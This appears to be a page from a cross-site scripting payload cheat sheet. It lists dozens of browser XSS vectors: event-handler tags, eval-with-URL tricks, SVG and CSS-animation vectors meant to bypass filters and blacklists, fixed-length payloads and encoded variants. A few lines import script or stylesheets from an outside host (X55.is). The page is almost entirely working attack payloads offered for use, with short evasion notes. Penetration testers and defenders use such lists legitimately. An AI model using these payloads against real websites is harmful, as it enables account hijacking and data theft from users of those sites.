<k oncontextmenu=alert(1)>right click this!
<k onauxclick=alert(1)>right click this!
<k oncut=alert(1)>copy this!                      Select text then ctrl+x
<k ondblclick=alert(1)>double click this!
<k ondrag=alert(1)>drag this!
<k contenteditable oninput=alert(1)>input here!
<k contenteditable onkeydown=alert(1)>press any key!
<k contenteditable onkeypress=alert(1)>press any key!
<k contenteditable onkeyup=alert(1)>press any key!
<k onmousedown=alert(1)>click this!
<k onmouseenter=alert(1)>hover this
<k onmousemove=alert(1)>hover this!
<k onmouseout=alert(1)>hover this!
<k onmouseover=alert(1)>hover this!
<k onmouseup=alert(1)>click this!
<k contenteditable onpaste=alert(1)>paste here!    Select text then ctrl+v
<k onpointercancel=alert(1)>hover this!
<k onpointerdown=alert(1)>hover this!
<k onpointerenter=alert(1)>hover this!
<k onpointerleave=alert(1)>hover this!
<k onpointermove=alert(1)>hover this!
<k onpointerout=alert(1)>hover this!
<k onpointerover=alert(1)>hover this!
<k onpointerup=alert(1)>hover this!
<k onpointerrawupdate=alert(1)>hover this!

(Chrome only):
<k autofocus contenteditable onfocus=alert(1)>focus this!

(Firefox only):
<k onafterscriptexecute=alert(1)>
<k onbeforescriptexecute=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Vector Without Alert - Eval + URL

Use as an alternative to call alert, prompt, and confirm. The first payload is the primitive form while the second replaces eval with the value of the id attribute of the vector used. URL must be in one of the following ways, in the URL path after the PHP extension or in a fragment of the URL, except in the last vector (it already has its payload). Plus sign (+) must be encoded in URLs.

--------------------------------------------------------------------
<svg onload=eval(" ' "+URL)>
<svg id=eval onload=top[id](" ' "+URL)>

The above PoC URL must contain one of the following:

=> file.php/'/alert(1)//?...
=> #'/alert(1)

${alert(1)}<svg onload=eval('`//'+URL)>
--------------------------------------------------------------------

---------------------------------------------------------------

Vector without Parentheses, Backticks or Entities

Use as alternative to alert(1), alert`1` or HTML Entities versions of those.

--------------------------------------------------------------------
<svg onload=innerHTML='\74img\11src\11onerror\75alert\501\51\76'>
<svg onload=outerHTML='\74img\11src\11onerror\75alert\501\51\76'>
--------------------------------------------------------------------

---------------------------------------------------------------

SVG Vectors without Event Handlers

Use to avoid filters looking for event handlers or src, data, etc. The last one is Firefox only, already URL encoded.

--------------------------------------------------------------------
<svg><a><rect width=99% height=99% /><set attributeName=href to=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href values=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href to=0 from=javascript:alert(1)>

(Firefox only):
<svg><use xlink:href=data:image/svg%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
--------------------------------------------------------------------

---------------------------------------------------------------

Using Attributes to Store Strings

The following vectors make use of the mandatory attribute to store the address of the import() function. Since it returns a valid image, “onload” is used instead of “onerror” in the 2nd vector below.

--------------------------------------------------------------------
<svg id=//X55.is onload=import(id)>
<img src=//X55.is onload=import(src)>
--------------------------------------------------------------------

---------------------------------------------------------------

Agnostic Event Handlers Vectors – CSS3 Based

Vectors with event handlers that can be used with arbitrary tag names useful to bypass blacklists.

They require CSS in the form of <style> or importing
stylesheet with <link>. Any alphabetic char or string can be used as a tag name
in place of “k” except when using when using the following stylesheet:
<link rel=stylesheet href=//X55.is/k>
--------------------------------------------------------------------
<k onanimationend=alert(1)><style>*{animation:s}@keyframes s{}
<k onanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<k onwebkitanimationend=alert(1)><style>*{animation:s}@keyframes s{}
<k onwebkitanimationstart=alert(1)><style>*{animation:s}@keyframes s{}
<k ontransitionend=alert(1)><style>*{transition:color 1s}*:hover{color:red}

(Firefox only):
<k ontransitionrun=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<k ontransitionstart=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<k ontransitioncancel=alert(1)><style>*{transition:color 1s}*:hover{color:red}
--------------------------------------------------------------------

---------------------------------------------------------------

Vectors for Fixed Input Length

Use when input must have a fixed length like in most common following hashes.

--------------------------------------------------------------------
MD5
12345678901<svg/onload=alert(1)>

SHA1
1234567890123456789<svg/onload=alert(1)>

SHA256
1234567890123456789012345678901234567890123<svg/onload=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Inner & Outer HTML Properties Alternative

These last vectors make use of innerHTML and outerHTML properties of elements to get the same result as the location ones. But they require to creation of a complete HTML vector instead of a “javascript:alert(1)” string. The following collections of elements can be used here with index 0 to make it easier to follow: all[0], anchors[0], embeds[0], forms[0], images[0], links[0], and scripts[0]. They all can replace the head or body elements used below.

<svg id=<img/src/onerror&#61alert(1)&gt; onload=head.innerHTML=id>
<svg id=<img/src/onerror&#61alert(1)&gt; onload=body.outerHTML=id>

PreviousBash Script NextXSS Cheat Sheet

Last updated 9 months ago